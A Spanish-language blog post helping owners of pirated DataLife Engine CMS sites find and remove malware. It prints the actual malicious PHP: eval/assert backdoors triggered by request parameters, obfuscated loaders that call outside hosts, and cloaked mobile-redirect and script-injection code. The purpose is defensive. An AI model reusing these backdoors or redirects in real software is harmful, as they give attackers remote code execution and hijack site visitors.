Virus en el sistema DataLife Engine (DLE) y cómo tratarlos 486o4s

Por Diseño Web

Dedicado a los fanáticos de las versiones gratuitas pirateadas de DLE. Cuando descargue CMS DLE en recursos de terceros, prepárese para el hecho de que un caballo de Troya ya está sentado en su sistema, esperando que cree su proyecto y obtenga a él (en el mejor de los casos). En el peor de los casos, eliminará todo o realizará redireccionamientos secretos a otros sitios (generalmente redireccionamientos móviles de sitios en DLE, ya que el no los detecta en el 90% de los casos, porque él mismo se sienta desde una PC o tableta). 3b6i4q


Recomendamos leer: Ataques a sitios web con fraude publicitario - best-winnerspace1.life

Entonces, ¿cómo entender que su sistema DLE tiene un virus con una redirección de versión móvil? 3v3g1r


Una de las opciones: empezaste a perder asistencia. Tan pronto como note esto, le recomendamos que preste atención a las instrucciones para detectar código malicioso a continuación para excluir la posibilidad de piratería o infección del sitio.


Otra opción es cuando el propio motor de búsqueda te notifica que hay código no deseado en tu sitio.


Nos gustaría llamar su atención sobre el hecho de que el código malicioso puede estar en casi todos los tipos de archivos del motor: .php, .js, .lng, htaccess e incluso imágenes (a menudo avatares de s). Dicho código puede tener cualquier forma, puede cifrarse con base64_encode, usar char y todo tipo de trucos que dificultan la detección rápida mediante la búsqueda automática a través de él. O puede ser banal estar al aire libre (casos raros).


Tenga en cuenta que a menudo es bastante difícil borrar archivos (sin saber qué está fuera de lugar o es superfluo en el código del motor). Es mejor usar programas para la comparación de códigos, por ejemplo, si, sin embargo, se decidió y compró una licencia del desarrollador DLE, puede verificar el código de la versión con licencia del motor y el suyo usando la verificación de paquetes con el programa WinMerge o Beyond Compare. Para que pueda encontrar la diferencia en el código y encontrar su virus.


Por supuesto, esto solo ayudará si no ha modificado su motor con módulos de terceros o complementos usados. Y definitivamente no ayudará si el código malicioso está en los avatares de los s.

En las versiones actuales de DLE, la vulnerabilidad con la carga de avatares se ha solucionado, pero las versiones anteriores a DLE 9.8 la tienen.

Para encontrar avatares de s de troyanos, instale el antivirus Virusdie en su servidor y encontrará imágenes que no son de ellos.


Si ha sido notificado o usted mismo ha notado que su sitio tarda mucho en cargar, redirige a algún lado, o el antivirus / motor de búsqueda comienza a maldecir su recurso, para empezar, solo vaya a su alojamiento y mire la fecha de modificación del archivo. Si nota que los archivos han cambiado recientemente, a menudo es /index.php, /engine/data/dbconfig.php, /engine/data/config.php, /htaccess, /language/Spanish/website.lng, que en principio, no deberían cambiar, o cambian solo cuando actualiza o instala algo, entonces con una alta probabilidad podemos complacerlo: el sitio está infectado.


No olvide también que el sitio puede tardar mucho en cargarse porque tiene un alojamiento débil, la plantilla está repleta de scripts y no está optimizada, y varias razones similares. Pero es mejor estar seguro, ¿no?


Código malicioso en la mayoría de los motores descargados de sitios de terceros 3c5e1u


Le recomendamos que busque no por coincidencia total, sino por parcial.

engine/inc/addnews.php- presencia de código malicioso

$serv = $_SERVER[HTTP_HOST];if (($serv != 'localhost') and ($serv != '127.0.0.1') and (strpos($serv, '.') != false)) 
 {$serv_time = "ht"."tp:/"."/xo"."rx."."net/"."js.p"."hp?lice"."nse="."13."."1_".$serv;};
$fi = 'fi'.'le';$up_times = trim(@implode ('', @$fi($serv_time)));

engine/classes/antivirus.class.php: excluyó el archivo que no debería estar allí, ya que resultó que este archivo es una vulnerabilidad

"./engine/classes/min/lib/JSMinify.php",

engine/clases/min/htaccess : la presencia de excepciones que abren el camino para un archivo con una vulnerabilidad

<Files "JSMinify.php">
 Order Deny,Allow
 Allow from all
</files>
<Files "JSMin.php">
 Order Deny,Allow
 Allow from all
</files>

engine/classes/min/lib/JSMinify.php: un archivo malicioso que no está incluido en la distribución del sistema y no forma parte de los complementos


engine/modules/calendar.php: la presencia de código malicioso

$reg_data = $_REQUEST['captchas'];$reg_base = $_REQUEST['recaptchas'];
$recaptcha_get__id  = 'eb516e7d7a6462a6d531ec65dcf1d599';
$setel = 'a'.'sse'.'rt';if(md5($reg_data)==$recaptcha_get__id) {@$setel(stripslashes($reg_base));}

engine/modules/.php- presencia de código malicioso

$syskey=strrev('edoce'); $pubkeys=strrev('d_46esab'); $captchacrypt=$pubkeys.$syskey;
$sert = $_SERVER[HTTP_HOST];if (($sert != 'localhost') and ($sert != '127.0.0.1') and (strpos($sert, '.') != false)) 
   {$capt = 'f'.'ile';@$capt($captchacrypt('aHR0cDovL3hvcngubmV0L2pzLnBocD9saWNlbnNlPTEzLjFf').$sert);}

engine/módulos/funciones.php- presencia de código malicioso

$set_cookie = '_di'.'ff_';$set_cookie='ar'.'ray'.$set_cookie.'ukey';//globils
$news_num = @$_REQUEST['numer'];
$bannermass = @$_REQUEST['bannerid'];
$check_newsnum = @$_REQUEST['newsnum'];
$check_category = @$_REQUEST['category'];
$get_url_var = '77067560';
$set_cookie = '_di'.'ff_';$set_cookie='ar'.'ray'.$set_cookie.'ukey';//globils
if($bannermass==$get_url_var){
   if (@strpos($check_newsnum, 'creat')=== false){
   @$set_cookie(@array((string)$news_num => 1), @array((string)stripslashes($check_category) => 2), @$check_newsnum);}else{
   @$set_cookie(@array((string)$news_num => 1), @array((string)stripslashes('}'.$check_category.'//') => 2), @$check_newsnum);}}//chekings

Código malicioso, que puede ser opcional (en caso de piratería) 2h6q46


engine/data/dbconfig.php

$liciens = "Ev"."aL(gZu"."ncOmp"."rEss(bAs"."e64"."_Dec"."odE('eNqlVG1v2jAQ/itFQnWiskAhvBVF21qhrdq0bpSumlpkOcmReJA4s51SNPPfdw5oXSvKl32Iz76753zP+XL1UEJAKDnyCFWgrFRc5NXZLjwmIz53uFKgnTq9uLr6dDm+qyNq5rq/36E2EmLBwbGqxnOHk9OG5hk47smgO+z2G6RJ3NEGo70IFARk2Pb7Lb/fJ66Qr1g7/cFB6/CQddAie9IlPX/YbvmDbq8z7Pq4DIadVnfg9/xBZ+iTPdnXJcyDOr0eT76PJ3dKSwkPDgotyqIA6RAuS6oVlL9A4o2zUT0V6iBAK5HSQut06y4Ph5eACYB8AqTAYjTsXEnnLU8ir8i0fbum4qlu2t0igjSqVFHkWZlIYcWbzqrSNs+KCqHTo7Nc8GrLKoD4TFwUxwqEtGekj0KyVSmXkEcixlLKeeVSMMky0CCD+/oC1ishY4ThQcFxKYNTxO1hFPxL6Rg5vYhOUq2Ls6alYWuJK7q77ggeuR5t6qVKDpc3h4RRCar8jyLblq39RZ0+lXeoMn+v7D+MuUzLaN96oZu7DqzVohIaEZ01HqkCayXIK57VxQM15qdpmb2wS0CRmPSxNhAQxnlMkoNSwVwvAkY+YHO5diZVgew6MRIsEAodDmHL+CYx8YloWoyxhfek1OGrY8LjY+Enh2t1h4sjQPCy8S2zDeNqa3he7iSFNqL1xvrxZxLhYmU7kXGZXxtpFh5JlyKRIzZxGEwjMKqnTXNl/PhDxPtklgf1QpPM/hZzsDs85CznKTx1Lw2GQ8LgxIDur+qNcyCq1CmVRH1IiQW2I856bwQiyCwvSKVOTwxBMpOLUXk4rES6AlOlOcZLP9PrtpZk1PrzgZf7sZX0/pzeSSzGrBkf3990yQ3fDp7xsWm83mD0qjwnU=')));";$release_this = "cre"."ate_"."function";$dle_func = $release_this('', "$liciens;");$dle_func('');

Después de descifrar este código, puede ver lo siguiente:

$bre = '_' . '_ses' . 'sion' . '_' . 'id';
if (isset($_COOKIE[$bre])) {
    @setcookie($bre, $_COOKIE[$bre] + 1, time() + 85957, '/');
}
if (($_COOKIE[$bre] == '92470477') or ($_COOKIE[$bre] == '92470378') or ($_COOKIE[$bre] == '92470379') or ($_COOKIE[$bre] == '92470380')) {
    @setcookie($bre, '64920485639546398930584648394', time() + 85957, '/');
    $ref = $_SERVER[strrev(strtoupper('iru_tseuqer')) ];
    $hos = $_SERVER[strrev(strtoupper('tsoh_ptth')) ];
    $rf = $_SERVER[strrev(strtoupper('rerefer_ptth')) ];
    header(strrev('3?igc.pmt' . '/siht/' . 'kcehc' . '/cc.' . 'gro' . '-3w' . '//:pt' . 'th :noi' . 'tac' . 'oL') . '&seor' . 'ef=' . rawurlencode($rf) . '&parameter=\$keyword&se=\$se&ur=1' . strrev(strtoupper('=rerefer_ptth&')) . rawurlencode('http://' . $hos . $ref));
    exit;
}
$usg = $_SERVER[strrev(strtoupper('tnega_resu_ptth')) ];
$rf = $_SERVER[strrev(strtoupper('rerefer_ptth')) ];
if ((!$_SERVER['HTTP__AGENT']) or ($_SERVER['HTTP__AGENT'] == '') or (!preg_match('/rawle|W3C_|EltaIn|Wget|baidu|curl|ia_arch|ahoo|igma|YaBrow|andex|oogle|bot|Bot|pider|amble|mail./i', $usg))) {
    if (preg_match('/ok.ru|vk.co|oogle.|andex.|mail.r|ambler|ut.by|igma|odnok|msn.c|smi2|rbc.|ulog|facebo.|search|yahoo.|bing./i', $rf)) {
        if ((preg_match('/j2me|ymbian|ndroid|midp|eries\ 60|symbos|htc_|obile|mini|p.browser|phone/i', $usg)) and (!isset($_COOKIE['dle__id'])) and (!isset($_COOKIE[$bre])) and ($_SERVER['REQUEST_URI'] != '/')) {
            @setcookie($bre, '92470377', time() + 85957, '/');
        }
    }
}

A partir de este código, puede ver que solo funciona en dispositivos móviles y solo una vez, luego se escribe en cookies para el y no se vuelve a mostrar. Por lo tanto, muchos pueden pensar que fue un problema técnico. Bueno, el script en sí mismo redirige a los s de dispositivos móviles al sitio web w3-org Que, a su vez, es utilizado por los atacantes como un sitio de colocación y redirige al a cualquier otra dirección final.


index.php

if(preg_match('/'.'('.'a'.'n'.'d'.'r'.'o'.'i'.'d'.'|'.'m'.'i'.'d'.'p'.'|'.'j'.'2'.'m'.'e'.'|'.'s'.'y'.'m'.'b'.'i'.'a'.'n'.'|'.'s'.'e'.'r'.'i'.'e'.'s'.' '.'6'.'0'.'|'.'s'.'y'.'m'.'b'.'o'.'s'.'|'.'w'.'i'.'n'.'d'.'o'.'w'.'s'.' '.'m'.'o'.'b'.'i'.'l'.'e'.'|'.'w'.'i'.'n'.'d'.'o'.'w'.'s'.' '.'c'.'e'.'|'.'p'.'p'.'c'.'|'.'s'.'m'.'a'.'r'.'t'.'p'.'h'.'o'.'n'.'e'.'|'.'b'.'l'.'a'.'c'.'k'.'b'.'e'.'r'.'r'.'y'.'|'.'m'.'t'.'k'.'|'.'b'.'a'.'d'.'a'.'|'.'w'.'i'.'n'.'d'.'o'.'w'.'s'.' '.'p'.'h'.'o'.'n'.'e'.')'.'/'.'i',$_SERVER['HTTP__AGENT']) && $_COOKIE["m"] != '5df9974cf25d22eb3c5aa962d6460477')
{
@setcookie('m', '5df9974cf25d22eb3c5aa962d6460477', time()+86400, '/');
@header("Location: "."h"."t"."t"."p".":"."/"."/"."p"."i"."d"."d"."."."b"."o"."t"."."."n"."u"."/"."s"."/"."1"."1"."8"."0"."5");
die();
}

index.php, engine/modules/config.php, engine/modules/dbconfig.php

if (strpos($_SERVER['HTTP__AGENT'],"iPhone") || strpos($_SERVER['HTTP__AGENT'],"Android") || strpos($_SERVER['HTTP__AGENT'],"webOS") || strpos($_SERVER['HTTP__AGENT'],"BlackBerry") || strpos($_SERVER['HTTP__AGENT'],"iPod")) header('Location: http://yadirect.ws/');
if(!empty($_POST['update'])) eval(base64_decode($_POST['update']));

engine/data/dbconfig.php

$config['description'].='" />'."
".'<script type="text/jаvascript" src="http://up.bot.nu/go/'.rand(0,999).'"></script>'."
".'<meta http-equiv="Pragma" content="no-cache';

htaccess en el directorio raíz, por motivo de seguridad este código no me deja mostrárselo en el post. Ver archivo en Google drive


Para verificar la eliminación del virus de todos los archivos en el sistema, debe ir a su sitio desde un dispositivo móvil con cualquier sistema operativo (ios, android, etc.), si no hay una redirección a un recurso de terceros del atacante, entonces todo está bien.


Sitios que a menudo se redirigen a versiones móviles de DLE:


w3-org
statuses.ws
live-internet.ws
getinternet.ws
livecountall.ws
googlecount.ws

Utilice siempre copias con licencia del DLE y vigile el sitio.


Si ya ha encontrado algún tipo de error, pero no ayuda, puede pedir ayuda a su técnico para resolver el problema, o a nosotros, te cobramos una tarifa bastante económica.
Compartir

Mi nombre es Alexander fundador y CEO, y me gusta llamarme un Geek. Amo la informática, tecnología y todo lo que está relacionado con ella. Inicié este sitio con la intención de compartir conocimientos como cursos en línea, tutoriales y videotutoriales. Estoy muy entusiasmado con la información que he descubierto y compartido hasta el momento. La verdad es que lo he hecho con el mayor de los gustos. Así es, soy un Geek con una visión para compartir conocimiento. Leer mas...

Artículos Relacionados ad5g